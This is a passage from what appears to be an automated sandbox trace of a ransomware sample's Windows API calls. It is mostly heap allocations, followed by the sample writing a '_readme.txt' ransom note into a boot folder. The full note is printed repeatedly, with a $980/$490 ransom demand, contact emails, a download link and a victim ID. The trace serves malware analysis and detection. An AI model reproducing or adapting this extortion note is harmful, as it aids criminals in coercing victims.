dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.854] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0093.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.854] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.854] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.854] PathFindFileNameW (pszPath="") returned="" [0093.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.854] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.855] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x335e120 [0093.855] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x335e120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0093.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.855] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x335e120 | out: hHeap=0x630000) returned 1 [0093.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b78ec8 [0093.855] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0093.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.855] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0093.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0093.859] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0093.859] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0093.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0093.859] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0093.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0093.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0093.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0093.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0093.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0093.860] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0093.860] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0093.861] CloseHandle (hObject=0x5c8) returned 1 [0093.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0093.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0093.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0093.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.861] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17e6c20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17e6c20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0093.862] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.862] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, 